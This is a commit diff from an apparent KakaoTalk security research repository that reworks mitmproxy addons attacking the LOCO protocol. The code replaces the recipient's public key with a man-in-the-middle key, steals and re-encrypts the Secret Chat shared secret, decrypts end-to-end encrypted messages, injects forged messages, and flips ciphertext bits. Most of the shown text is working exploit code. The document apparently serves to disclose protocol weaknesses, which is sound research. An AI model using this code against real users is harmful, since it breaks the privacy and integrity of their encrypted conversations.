gnh1201/kakaotalk_analysis
1
0
Fork 0
mirror of https://github.com/stulle123/kakaotalk_analysis.git synced 2025-02-06 06:55:29 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add more add-ons

Browse Source
This commit is contained in:
stulle123 2023-10-06 14:59:15 +02:00
parent 54f315d57a
commit 0ee41ca2a6
1 changed files with 125 additions and 62 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

187
scripts/mitmproxy/loco_mitm.py
View File

@ -7,15 +7,15 @@ from mitmproxy import connection, tcp, tls
from mitmproxy.utils import human, strutils
class LocoMitm:
def __init__(self, rsa_key_pair, master_secret=None) -> None:
class LocoMitmBase:
def __init__(self, rsa_key_pair, master_secret=None, test_key=None) -> None:
self.parser = LocoParser()
self.rsa_key_pair = rsa_key_pair
self.recipient_user_id = 0
self.recipient_public_key = b""
self.shared_secret = b""
self.master_secret = master_secret
self.e2e_encryption_key = None
self.e2e_encryption_key = test_key
@staticmethod
def get_addr(server: connection.Server):
@ -26,15 +26,15 @@ class LocoMitm:
logging.info("Skip TLS intercept for %s.", human.format_address(server_address))
data.ignore_connection = True
class SecretChatMitm(LocoMitmBase):
def compute_e2e_encryption_key(self, shared_secret):
if not self.e2e_encryption_key:
logging.info(
"Computing E2E encryption key with shared secret: %s", shared_secret
)
self.e2e_encryption_key = self.parser.get_e2e_encryption_key(shared_secret)
else:
logging.info(
"E2E encryption key: %s", base64.b64encode(self.e2e_encryption_key)
"Shared secret: %s E2E encryption key: %s",
shared_secret,
base64.b64encode(self.e2e_encryption_key),
)
def tcp_message(self, flow: tcp.TCPFlow):
@ -47,76 +47,90 @@ class LocoMitm:
message.from_client,
self.parser.loco_packet.get_packet_as_dict(),
)
else:
logging.warning(
"from_client=%s, raw packet bytes=%s",
message.from_client,
strutils.bytes_to_escaped_str(message.content),
)
return
# If there's already a shared secret stored on the server remove it from the LOCO packet
if (
not message.from_client
and self.parser.loco_packet
and self.parser.loco_packet.loco_command in {"SCREATE", "CHATONROOM"}
):
if not message.from_client and self.parser.loco_packet.loco_command in {
"SCREATE",
"CHATONROOM",
}:
if isinstance(self.parser.loco_packet.body_payload, bytes):
logging.error(
logging.warning(
"Dropping %s packet as we cannot decode the packet body.",
self.parser.loco_packet.loco_command,
)
message.content = b""
return
tampered_packet = self.parser.remove_stored_shared_secret(
self.recipient_user_id
)
tampered_packet = self.parser.remove_stored_shared_secret()
if tampered_packet:
message.content = tampered_packet
# Get recipient's public key and replace it with our MITM public key
if (
not self.master_secret
and self.parser.loco_packet
and not message.from_client
and self.parser.loco_packet.loco_command
in {"GETPK", "GETLPK", "SCREATE", "CHATONROOM"}
):
logging.info("Trying to parse recipient's public key from LOCO packet...")
(
self.recipient_public_key,
recipient_public_key,
self.recipient_user_id,
tampered_packet,
) = self.parser.inject_public_key(self.rsa_key_pair)
if (
not self.recipient_public_key
or not self.recipient_user_id
or not tampered_packet
):
if not recipient_public_key:
logging.error(
"Could not inject MITM public key into %s packet.",
"Could not parse recipient public key from %s packet.",
self.parser.loco_packet.loco_command,
)
return
else:
self.recipient_public_key = recipient_public_key
if not self.recipient_user_id:
logging.error(
"Could not parse recipient user ID from %s packet.",
self.parser.loco_packet.loco_command,
)
return
if not tampered_packet:
logging.error(
"Could not create a fake %s packet.",
self.parser.loco_packet.loco_command,
)
return
message.content = tampered_packet
logging.info("Injecting MITM public key...")
message.content = tampered_packet
# logging.info("Tampered packet: %s", self.parser.loco_packet.get_packet_as_dict())
# Grab the shared secret which is used to compute the E2E encryption key
# Grab the shared secret from the "SETSK" packet
if (
self.recipient_public_key
and not self.master_secret
and self.parser.loco_packet
and message.from_client
and self.parser.loco_packet.loco_command == "SETSK"
):
logging.info("Trying to parse shared secret from LOCO packet...")
self.shared_secret = self.parser.get_shared_secret(self.rsa_key_pair)
shared_secret = self.parser.get_shared_secret(self.rsa_key_pair)
if not self.shared_secret:
if not shared_secret:
logging.error("Couldn't parse shared secret from LOCO packet.")
# TODO: remove
logging.info("Dropping SETSK packet...")
message.content = b""
return
self.shared_secret = shared_secret
logging.info("Shared secret: %s", self.shared_secret)
# Re-encrypt shared secret with the recipient's original public key
@ -131,9 +145,6 @@ class LocoMitm:
logging.info(
"Re-encrypted shared secret with recipient's original public key."
)
# TODO: remove
logging.info("Dropping SETSK packet...")
message.content = b""
# Compute E2E encryption key
if self.shared_secret:
@ -143,21 +154,15 @@ class LocoMitm:
self.compute_e2e_encryption_key(self.master_secret)
# Decrypt Secret Chat end-to-end encrypted message
if (
self.e2e_encryption_key
and self.parser.loco_packet
and (
(
message.from_client
and self.parser.loco_packet.loco_command == "SWRITE"
)
or (
not message.from_client
and self.parser.loco_packet.loco_command == "MSG"
)
if self.e2e_encryption_key and (
(message.from_client and self.parser.loco_packet.loco_command == "SWRITE")
or (
not message.from_client
and self.parser.loco_packet.loco_command == "MSG"
)
):
logging.info("Trying to decrypt E2E message...")
logging.info("Trying to decrypt Secret Chat message...")
decrypted_e2e_message = ""
if self.master_secret:
decrypted_e2e_message = self.parser.get_decrypted_e2e_message(
@ -169,33 +174,91 @@ class LocoMitm:
)
if decrypted_e2e_message:
logging.warning(
"from_client=%s, content=%s",
logging.info(
"from_client=%s, Secret Chat message=%s",
message.from_client,
decrypted_e2e_message,
)
if not self.parser.loco_packet:
class InjectMessage(LocoMitmBase):
def __init__(self) -> None:
self.parser = LocoParser()
def tcp_message(self, flow: tcp.TCPFlow):
message = flow.messages[-1]
self.parser.parse(message.content)
if self.parser.loco_packet:
logging.info(
"from_client=%s, content=%s",
message.from_client,
self.parser.loco_packet.get_packet_as_dict(),
)
else:
logging.warning(
"from_client=%s, raw packet bytes=%s",
message.from_client,
strutils.bytes_to_escaped_str(message.content),
)
# Inject a new message to show there are no integrity checks on the ciphertext
# tampered_packet = parser.inject_message("foo", "bar")
return
# if tampered_packet:
# message.content = tampered_packet
# Inject a new message to show that there are no integrity checks on the ciphertext
tampered_packet = self.parser.inject_message("foo", "bar")
if tampered_packet:
message.content = tampered_packet
class FlipCiphertextBits(LocoMitmBase):
def tcp_message(self, flow: tcp.TCPFlow):
message = flow.messages[-1]
self.parser.parse(message.content)
if self.parser.loco_packet:
logging.info(
"from_client=%s, content=%s",
message.from_client,
self.parser.loco_packet.get_packet_as_dict(),
)
else:
logging.warning(
"from_client=%s, raw packet bytes=%s",
message.from_client,
strutils.bytes_to_escaped_str(message.content),
)
return
# Flip bits of the ciphertext to show CFB malleability
# flipped_packet = parser.flip_bits()
flipped_packet = self.parser.flip_bits()
# if flipped_packet:
# message.content = flipped_packet
if flipped_packet:
message.content = flipped_packet
# TODO: rename to 'test_secret'
master_secret = b"AAAAAAAAAAAAAAAAAAAAAA=="
class TLSIntercept:
@staticmethod
def get_addr(server: connection.Server):
return server.peername or server.address
addons = [LocoMitm(rsa_key_pair=get_rsa_key_pair())]
def tls_clienthello(self, data: tls.ClientHelloData):
if data.context.client.sni == "buy.kakao.com":
logging.info("MITM buy.kakao.com")
return
else:
server_address = self.get_addr(data.context.server)
logging.info(
"Skip TLS intercept for %s.", human.format_address(server_address)
)
data.ignore_connection = True
test_secret = b"AAAAAAAAAAAAAAAAAAAAAA=="
test_e2e_key = base64.b64decode("H1mnODpo+XZ+SEF8nR8p/ZYpNpAaLBLgB98E0tF+7Ek=")
# addons = [SecretChatMitm(rsa_key_pair=get_rsa_key_pair())]
# addons = [InjectMessage()]
# addons = [FlipCiphertextBits()]
addons = [TLSIntercept()]